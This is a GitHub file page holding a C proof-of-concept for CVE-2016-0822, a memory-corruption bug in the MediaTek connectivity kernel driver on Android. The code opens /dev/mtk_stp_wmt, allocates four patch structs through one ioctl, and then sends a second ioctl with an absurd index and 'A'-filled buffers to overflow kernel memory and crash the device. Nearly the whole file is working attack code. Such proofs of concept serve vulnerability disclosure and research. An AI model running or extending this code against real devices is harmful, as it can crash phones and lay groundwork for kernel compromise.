-
Notifications
You must be signed in to change notification settings - Fork 203
/
CVE-2016-0822-mtk.c
93 lines (74 loc) · 2.32 KB
/
CVE-2016-0822-mtk.c
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
/**
*
* CVE-2016-0822-mtk.c
*
* POCs a series of issues in the MediaTek Conectivity Driver
*
* https://android.googlesource.com/kernel/mediatek/+/d13e4b9986d3e6f57dbd595d5a8398c254d45fa4/drivers/misc/mediatek/connectivity/common/combo/linux/wmt_dev.c#1174
*
* https://android.googlesource.com/kernel/mediatek/+/d13e4b9986d3e6f57dbd595d5a8398c254d45fa4/drivers/misc/mediatek/connectivity/common/combo/linux/wmt_dev.c#1158
*
*/
#include <inttypes.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <errno.h>
#include <unistd.h>
#include <fcntl.h>
#include <sys/mman.h>
#include <sys/ioctl.h>
#define WMT_IOC_MAGIC 0xa0
#define WMT_IOCTL_SET_PATCH_NUM _IOW(WMT_IOC_MAGIC, 14, int)
#define WMT_IOCTL_SET_PATCH_INFO _IOW(WMT_IOC_MAGIC, 15, char*)
#define UINT32 uint32_t
#define UINT8 uint8_t
typedef struct {
UINT32 dowloadSeq;
UINT8 addRess[4];
UINT8 patchName[256];
} WMT_PATCH_INFO;
const static char *driver = "/dev/mtk_stp_wmt";
static int open_driver(void)
{
int fd;
fd = open(driver, O_RDWR);
if (fd < 0) {
printf("Failed to open %s, with errno %s\n", driver, strerror(errno));
exit(EXIT_FAILURE);
}
return fd;
}
static void allocate_kernel_struct(int fd)
{
int ret = 0;
/* Allocate 4 WMT_PATCH_INFO Structs in the driver */
ret = ioctl(fd, WMT_IOCTL_SET_PATCH_NUM, 4);
if (ret < 0) {
printf("Allocation of structs failed, %s\n", strerror(errno));
exit(EXIT_FAILURE);
}
}
static void overflow_struct(int fd)
{
int ret = 0;
WMT_PATCH_INFO overflow;
/* set some absurd offset, in hopes of causing panic or GPF */
overflow.dowloadSeq = 0x31337;
/* set obvious bogus data into data fields.
* If I had exploitation skills these would contain pointers to userland!
*/
memset(&overflow.addRess, 'A', 4);
memset(&overflow.patchName, 'A', 256);
ret = ioctl(fd, WMT_IOCTL_SET_PATCH_INFO, &overflow);
if (ret < 0) {
printf("Overflow ioctl failed %s\n", strerror(errno));
exit(EXIT_FAILURE);
}
}
int main(void) {
int fd = -1;
fd = open_driver();
allocate_kernel_struct(fd);
overflow_struct(fd);
}